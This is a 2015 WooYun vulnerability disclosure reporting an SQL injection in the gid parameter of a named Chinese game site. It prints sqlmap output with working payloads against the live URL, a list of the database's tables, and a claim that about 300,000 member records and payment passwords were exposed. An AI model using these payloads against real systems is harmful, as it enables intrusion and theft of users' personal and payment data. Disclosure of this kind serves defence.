当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120310

漏洞标题:游戏族主站SQL注入泄漏30万会员信息及支付密码

相关厂商:游戏族

漏洞作者: 路人甲

提交时间:2015-06-15 11:23

修复时间:2015-07-30 11:24

公开时间:2015-07-30 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

游戏族主站SQL注入泄漏30万会员信息及支付密码

详细说明:

http://www.zugame.com/xsk/?gid=249


1.png

28个库:

2.png

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=249 AND 4954=4954
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: gid=249 AND 2415=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2415=2415) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: gid=-8823 UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(70)+CHAR(83)+CHAR(72)+CHAR(117)+CHAR(72)+CHAR(122)+CHAR(85)+CHAR(118)+CHAR(111)+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113),NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: gid=-8764 OR 7099=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: gid=(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8403=8403) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: AccDB
[54 tables]
+-----------------------+
| Account_tmp           |
| CPS_Binding           |
| D99_Tmp               |
| Forum                 |
| GOpenList             |
| GameList              |
| Gllj                  |
| GuildLink             |
| GuildUser             |
| HFForum               |
| LZCQ                  |
| New                   |
| PhoneBinding          |
| SQL_Dir               |
| SQL_Path              |
| Settlement            |
| ShouChong             |
| T_Dict_AlignIllegal   |
| T_Dict_AreaList       |
| T_Dict_AuthTypeDefine |
| T_Dict_DefaultFace    |
| T_Dict_GameType       |
| T_Dict_IPData         |
| T_Dict_IllegalWord    |
| T_Dict_JobList        |
| T_Dict_PartnerID      |
| T_Dict_PartnerID      |
| T_Dict_Question       |
| T_FindPWD             |
| T_IDCard              |
| T_Partner_User        |
| T_PhoneAuthByPwdReset |
| T_Queen_User          |
| T_ReturnValue         |
| T_SecretCard_Del      |
| T_SecretCard_Del      |
| T_UserDetails         |
| T_UserGameInfo        |
| T_UserKey             |
| T_UserLoginError      |
| T_UserOtherInfo       |
| T_UserPayPWD          |
| T_UserUpdEmailPush    |
| T_Validate_Email      |
| T_Validate_IDCardLog  |
| T_Validate_IDCardLog  |
| T_Validate_Moblie     |
| T_ZCEMailSendHisory   |
| T_ZCVipUser           |
| XinShouKa             |
| libao                 |
| pangolin_test_table   |
| sccharge              |
| shangcheng            |
+-----------------------+

漏洞证明:

34万会员信息:

3.png

4.png

34万支付密码:

5.png

6.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)